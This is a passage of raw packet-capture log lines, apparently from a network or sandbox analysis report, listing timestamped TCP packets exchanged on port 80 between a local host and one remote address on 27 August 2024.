                                Aug 27, 2024 09:49:43.534302950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534328938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534341097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534349918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534362078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534372091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534380913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534384012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534395933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534408092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534410954 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534419060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534426928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534435034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534446955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534451008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534459114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534468889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534477949 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534481049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534492016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534497023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534538031 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534813881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534825087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534835100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534846067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534857988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534858942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534871101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534882069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534883022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534893990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534898043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534905910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534917116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534923077 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534929991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534940004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534950018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534953117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534965992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534969091 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.534976959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.534989119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535001993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.535028934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.535115004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535128117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535139084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535151958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535161972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.535162926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535168886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535175085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535176039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.535249949 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.535269022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535280943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535291910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535301924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535314083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535315990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.535326958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535337925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535337925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.535350084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535376072 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.535398960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.535419941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535433054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535444021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535454988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535468102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535470009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.535478115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535490990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.535500050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.535523891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.586321115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.619779110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.619800091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.619812965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.619828939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.619842052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.619863033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.619875908 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.619887114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.619901896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.619914055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.619942904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.619942904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.619955063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.619961023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.619967937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.619992971 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620049953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620131016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620131016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620148897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620167971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620177984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620188951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620192051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620202065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620212078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620218039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620223999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620235920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620238066 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620254040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620263100 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620265961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620275974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620292902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620299101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620306015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620316029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620316982 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620327950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620340109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620342016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620378017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620381117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620393038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620404959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620417118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620419979 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620444059 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620754957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620765924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620780945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620794058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620804071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620809078 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620815992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620827913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620831013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620834112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620843887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620846033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620855093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620867968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620873928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620878935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620888948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620898962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620901108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620918989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620925903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620929956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620948076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620960951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620970011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620971918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620985985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.620995998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.620996952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621006012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621010065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621021986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621030092 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621033907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621046066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621061087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621062994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621074915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621085882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621093035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621112108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621249914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621260881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621272087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621284962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621296883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621300936 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621306896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621319056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621325016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621330023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621341944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621344090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621352911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621361017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621364117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621375084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621403933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621412992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621423960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621436119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621468067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621491909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621504068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621520042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621532917 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621532917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621545076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621556997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621573925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621582985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621680975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621690989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621701002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621712923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621722937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621728897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621733904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621747971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621752977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621759892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621769905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621774912 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621788025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621793985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621803045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621814013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621819973 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621840954 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621862888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621874094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621885061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621896029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621906996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.621911049 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621936083 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.621949911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.622044086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622055054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622065067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622076035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622087955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622096062 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.622100115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622112036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622119904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.622124910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622133017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.622138023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622149944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622162104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622170925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.622174978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622193098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.622219086 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.622299910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622322083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622333050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622361898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.622368097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622379065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622385025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622392893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.622443914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.623281002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.623292923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.623303890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.623316050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.623327971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.623330116 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.623339891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.623342991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.623366117 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.623379946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.623429060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.706746101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.706769943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.706780910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.706839085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.706870079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.706882000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.706935883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.706935883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.706935883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.706964016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707015038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707026005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707060099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.707137108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707166910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707178116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707185030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.707191944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707206964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707217932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.707245111 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.707273960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707285881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707295895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707305908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.707323074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.707351923 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708208084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708252907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708265066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708302021 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708311081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708323002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708336115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708347082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708354950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708369017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708451986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708462954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708473921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708492041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708503008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708507061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708522081 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708547115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708646059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708657026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708667040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708678007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708693981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708694935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708707094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708720922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708728075 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708733082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708745003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708750010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708755970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708776951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708801985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708852053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708873034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708884954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708897114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708911896 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.708918095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.708937883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709126949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709137917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709148884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709171057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709172010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709183931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709192991 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709196091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709208012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709218979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709227085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709230900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709242105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709244013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709254026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709264040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709266901 CEST4971580192.168.2.8188.114.96.3
